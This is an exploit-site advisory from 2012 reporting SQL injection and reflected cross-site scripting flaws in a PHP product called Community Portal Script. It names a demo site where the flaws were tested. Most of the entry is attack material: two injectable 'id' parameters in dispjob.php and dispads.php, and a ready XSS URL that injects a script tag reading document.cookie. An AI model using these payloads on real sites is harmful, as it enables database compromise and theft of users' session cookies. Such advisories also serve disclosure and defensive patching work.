id: 18712
date: 06/20/2012
title: Community Portal Script Sql Injection/XSS Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

Community Portal Script Sql Injection/XSS Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://communityportalscript.com/
.:. Tested On Demo : http://www.bnbharat.com/
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================

http://SITE/dispjob.php?id=sql
http://SITE/dispads.php?id=sql


Reflected XSS
==============


http://SITE/dispads.php?id="><script>alert(document.cookie)</script>


#######################################################################



#  0day.today [2023-03-21]  #